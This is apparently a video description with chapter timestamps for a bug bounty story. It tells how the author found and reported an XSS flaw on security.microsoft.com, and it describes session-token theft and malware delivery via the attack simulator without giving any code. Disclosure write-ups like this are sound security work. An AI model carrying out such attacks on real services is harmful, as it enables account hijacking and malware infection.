🔒 Unveiling My Journey: From Finding XSS Vulnerability to Submitting it to Microsoft 🔒

🔒 Unveiling My Journey: From Finding XSS Vulnerability to Earning Bounties at Microsoft 🔒

In December 2022, I stumbled upon an XSS (Cross-Site Scripting) vulnerability on security.microsoft.com, and today, I’m thrilled to share my incredible journey with you! After many months of anticipation, I can finally disclose the details of how I discovered and successfully exploited this security flaw, ultimately submitting not one but TWO vulnerabilities to Microsoft’s Bug Bounty program.

Join me as we dive deep into the world of cybersecurity, from identifying potential weak spots to crafting and executing two attack paths that led to success. These scenarios involved stealing users’ session tokens and delivering malware via the attack simulator hosted on Microsoft’s websites. I’ll take you through every step of the process, offering insights and tips for budding ethical hackers.

But that’s not all! We’ll also explore the inner workings of Microsoft’s Bug Bounty program, discussing the submission process and the calculations involved in earning rewards for responsible disclosure.

Whether you’re a cybersecurity enthusiast or simply curious about the world of ethical hacking, this video has something for everyone. Don’t forget to like, subscribe, and hit the notification bell to stay updated on all things cybersecurity. Let’s embark on this exciting journey together! 💻🌐🛡️

#Cybersecurity #EthicalHacking #BugBounty #XSSVulnerability #MicrosoftSecurity


0:00 intro
0:23 Discovery of a vulnerability
0:42 Location of the vulnerability
0:50 We found XSS
1:04 Educate yourself
1:31 W3school FTW
1:51 Bug bounties are a competition
02:07 XSS explained
02:51 The details of the Vulnerability in the portal
03:24 XSS: steal session token
03:59 Abuse the attack simulator to deliver Malware
05:00 Submitting the report
06:00 Reseacher leaderboard
06:14 Score calculation
06:39 Outro

Leave a Reply

Your email address will not be published. Required fields are marked *